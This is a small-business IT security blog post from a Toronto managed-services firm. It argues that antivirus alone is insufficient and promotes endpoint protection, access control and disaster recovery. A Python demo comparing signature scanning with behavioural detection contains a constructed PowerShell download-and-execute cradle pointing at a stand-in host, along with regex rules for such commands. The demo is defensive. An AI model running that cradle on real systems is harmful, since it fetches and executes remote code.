Commercial antivirus software was wildly popular a few years ago, and many companies still swear by it to protect their IT infrastructure and computer networks. But do its claims to protect computers from malicious attacks still hold up to modern IT security standards? The answer is a clear no. Antivirus alone is not enough to protect business data.
So the more important questions are: by what margin does current antivirus software lag behind modern computer security standards, and what can small and medium businesses do to protect themselves from growing cyberattacks? Let’s find out.
How most modern antivirus software works (and when it doesn’t)
Almost all major antivirus products today run on the same principle - they keep a database of signatures (hashes or byte patterns) of known malicious files, or viruses, and compare the files on a computer against it. If a file matches, it is quarantined before the attack can be carried out. This is the core principle behind most antivirus software, although individual products add their own features that set them apart from the rest.
For instance, many newer antivirus products come with features like “real-time protection” and “real-time scanning” that let the software check a file the moment it is written or opened, without waiting for a scheduled or manually triggered system scan. Although this is a significant improvement over traditional scheduled scanning, there are still some glaring issues.
The vast majority of attacks are fileless
Fileless attacks are malware attacks that do not drop a regular file that traditional commercial antivirus software can scan. Instead, the malicious code runs only in memory, or the attacker abuses tools that are already installed and trusted on the machine, such as PowerShell, the Windows scripting engines or WMI, so a scanner that looks for known-bad files on disk has nothing to match. These attacks are becoming extremely prevalent and are making antivirus software less effective: in 2017, 77% of successful malware attacks were fileless, and they have grown very quickly since, with 2020 seeing 888% more fileless malware than 2019.
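To make that gap concrete, here is an added example (not from the original article, and not how any particular antivirus product is implemented). It puts a hash-based file scanner with a constructed signature database beside a few command-line rules of the kind an endpoint product applies to running processes. The sample file contents, the hashes, the PowerShell command lines and the domain in the download cradle are all constructed for this example.

```python
import base64
import hashlib
import re

# Constructed "signature database": SHA-256 hashes of known-bad file contents.
# Real products hold millions of entries, but the matching principle is the same.
_KNOWN_BAD_FILES = [
    b"MZ\x90\x00\x03\x00\x00\x00 constructed-dropper-sample-v1",
]
SIGNATURE_DB = {hashlib.sha256(f).hexdigest() for f in _KNOWN_BAD_FILES}


def signature_scan(file_bytes: bytes) -> bool:
    """Classic file scanning: flag the file only if its hash is already known."""
    return hashlib.sha256(file_bytes).hexdigest() in SIGNATURE_DB


# Behavioural rules applied to a process command line. They catch abuse of a
# tool that is already on the machine (PowerShell here), which a file scanner
# never sees because no new file is written to disk.
_ENCODED_ARG = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
_RULES = {
    "encoded_command": _ENCODED_ARG,
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "no_profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "download_cradle": re.compile(r"(?i)downloadstring\(|invoke-webrequest|\biwr\b"),
    "invoke_expression": re.compile(r"(?i)\biex\b|invoke-expression"),
}


def decode_encoded_command(cmdline: str) -> str:
    """PowerShell's -EncodedCommand argument is base64 of UTF-16LE text.

    Returns the decoded script, or '' if there is no (valid) encoded argument.
    """
    m = _ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def behaviour_scan(cmdline: str) -> list[str]:
    """Return the names of the rules tripped by the command line or its decoded payload."""
    texts = [cmdline, decode_encoded_command(cmdline)]
    return [name for name, rx in _RULES.items() if any(rx.search(t) for t in texts)]


def demo() -> dict:
    """Run both scanners over constructed events and return the verdicts."""
    known_bad = _KNOWN_BAD_FILES[0]
    repacked = known_bad + b"\x00"  # same malware, one byte appended: new hash
    # Constructed download cradle; malware.example is a reserved, non-routable name.
    payload = "IEX (New-Object Net.WebClient).DownloadString('http://malware.example/p.ps1')"
    encoded = base64.b64encode(payload.encode("utf-16-le")).decode("ascii")
    fileless_cmdline = f"powershell.exe -nop -w hidden -enc {encoded}"
    benign_cmdline = r"powershell.exe -File C:\scripts\backup.ps1"
    return {
        "known_bad_file_caught": signature_scan(known_bad),      # True
        "repacked_file_caught": signature_scan(repacked),        # False: hash changed
        "decoded_payload": decode_encoded_command(fileless_cmdline),
        "fileless_behaviour_hits": behaviour_scan(fileless_cmdline),
        "benign_behaviour_hits": behaviour_scan(benign_cmdline),  # []
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two things stand out when this runs. Appending a single byte to the known-bad file defeats the hash lookup, which is why signature databases need constant updates and still miss repacked samples. The fileless command line never touches disk at all, so the file scanner has nothing to hash, but the command-line rules flag it on several counts (encoded command, hidden window, no profile, download cradle, Invoke-Expression), and the same rules stay silent on an ordinary scheduled script. Real endpoint products apply far richer versions of this logic, but the division of labour is the same.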
An antivirus may slow down the computer if RAM is lacking
Although antivirus software has improved significantly in how it uses computer resources, it can still sometimes use too much. For instance, on an idle Windows 10 machine, the built-in Windows Defender real-time protection is responsible for a sizable chunk of RAM, which many small business workplaces don’t have to spare. Full-system scans are even more taxing on the hardware and, in extreme cases, make the computer unusable while the scan is in progress.
Many small business owners ignore the advice of their IT consultant when purchasing computers and go for cheaper specifications without realizing the impact on performance. When you average the cost difference over the life span of the device, choosing better components makes more sense than the immediate gratification of a lower price point. As the saying goes, you get what you pay for.
Antivirus relies on regular updates
Since antivirus software works by matching files against a database of identified malware, it is only as good as that database. With more than 360,000 new pieces of malware detected every day in 2020 (on average), keeping the database up to date isn’t easy. The antivirus developer may be excellent, but something as simple as ignoring the latest antivirus update, or a subscription that lapses because of a missed payment, can be enough for a computer to be infected by malware its local database doesn’t yet know about.
Other threats that antivirus can’t stop
In addition to fileless malware and attacks designed to get past specific firewalls, small and medium businesses face a myriad of threats, and antivirus software simply cannot protect companies from many of them.
Unfortunately, more than half (54%) of all email malware attacks target small and medium businesses. And since the majority of such attacks carry malicious links used for phishing rather than downloadable files, most antivirus software cannot detect them: a link that leads to a fake login page puts nothing on disk for the scanner to inspect, and the credentials the employee types in are the real payload.
One of the most common forms of cyberattack targeting SMBs is ransomware, which results in data encryption almost 75% of the time. Here too antivirus falls short: it can only block a ransomware sample it already recognises before it runs, and once the files are encrypted it has no data recovery capabilities, so the business is left with whatever backups it kept.
Insider Threats and Access Control
A surprisingly high number of cyberattacks stem from insider threats, that is, from the company’s own employees. Lax access control and identity management can mean that employees who shouldn’t have access to critical business information do. There does not even have to be malicious intent; simple carelessness can cause critical information to leak out, and antivirus software will not notice, because nothing malicious ever runs on the machine.
Security alternatives to antivirus for SMBs to consider
Antivirus software is a necessary piece of software that can protect consumer devices such as personal computers and even smartphones. However, when the stakes are higher and you need to protect a network of devices or the IT infrastructure of your business, an antivirus alone isn’t enough - you need a more comprehensive security solution that covers the numerous threats faced by SMBs today.
One of the most popular of such solutions is endpoint protection. While antivirus software focuses on protecting individual devices from malicious files, endpoint protection platforms focus on the entire fleet of devices and the data that moves between them (ensuring that data does not go where it isn’t supposed to). Modern endpoint products also watch what running processes do, not just what files look like, which is how they catch the fileless attacks described above.
And unlike standalone antivirus, endpoint protection is managed centrally rather than on each device separately: a small agent runs on every device and reports to a console, hosted in the cloud or on-premises, from which an IT team can remotely manage firewalls, data loss prevention policies, and access control on every connected device.
Identity Management (IAM) and Granular Access Control
Endpoint protection is often paired with a powerful identity and access management (IAM) tool, although the two serve different purposes. Endpoint protection is geared towards device management and ensuring that none of the devices connected to the network can become a threat. IAM tools, on the other hand, give business owners granular access control over every person who interacts with the network in any capacity, ensuring that no employee has more access privileges than they absolutely need (the principle of least privilege).
Security platforms or suites that offer endpoint protection will often also have some level of IAM capability, so in most cases you don’t have to look elsewhere.
Unfortunately, cyberattacks are becoming increasingly difficult to avoid, and 68% of Canadian businesses anticipate being hit by a ransomware attack in the future. One area where antivirus software is miserably under-equipped is mitigating damage after a cyberattack has already happened. This is where Disaster Recovery (DR) software can help tremendously.
Disaster Recovery (DR) involves comprehensive plans, backed by the right tools, to get services and data back online after a critical failure, such as a major Denial of Service (DoS) attack or a ransomware infection. Disaster recovery software gives businesses more flexibility than simply keeping a backup of their data, as it enables them to:
- control the speed of the recovery to match their SLAs
- keep services online despite an attack (albeit at limited scale and performance)
- carry out recovery without disrupting the customer experience, and more.
IT Security Team
One of the biggest appeals of antivirus software is its fire-and-forget nature: outside of regular (automatic) updates, it requires no maintenance. Unfortunately, this is simply not enough to prevent cyberattacks or, more importantly, to deal with the aftermath. Companies need competent IT security staff to help employees work in a secure environment.
Additionally, an IT security team can give employees the training and best practices they need to protect themselves (and the company): for instance, how to choose and store passwords, how to manage their company devices, how to recognize phishing emails, and so on.
Thankfully, there are numerous ways to meet this requirement today, so companies aren’t limited to hiring a full-time in-house security team. Staff augmentation, managed services agencies, and outsourcing can all achieve similar results.
Conclusion: antivirus isn’t useless, but it’s not a standalone solution
Antivirus software does serve a vital purpose - it is a layer of defence against potential cyber threats. What we want to ensure is that it is not the sole layer of defence. As we’ve discussed, there are massive gaps in even modern antivirus software that leave businesses prone to attacks. A layered defence strategy will ensure that when (not if) the antivirus software fails, a different security mechanism can stop the attack from doing any lasting damage.
So the question is, what do you need in addition to antivirus to protect your SMB? Do you need all of the mechanisms discussed above or just one? Ideally, you’d want everything to protect your business but that may not be possible given the cost, time, and manpower constraints that many SMBs have.
So we recommend working with a cybersecurity expert to conduct an audit and find out where your business is most at risk. With remote working becoming more prevalent, most businesses could seriously benefit from a dedicated endpoint protection platform to manage their endpoints (mobiles, tablets, and computers). It’s also highly recommended that you have an IT staff specifically for security. As we discussed, managed IT services agencies and outsourcing are popular and effective alternatives to a full-time in-house team.
For more help with your IT security and a personalized IT security consultation, call TUCU (tech u can use). We are SMB IT Experts serving Toronto since 2003. We offer complete IT management services, including server management, network management and cloud management. We will help you protect everything you have built.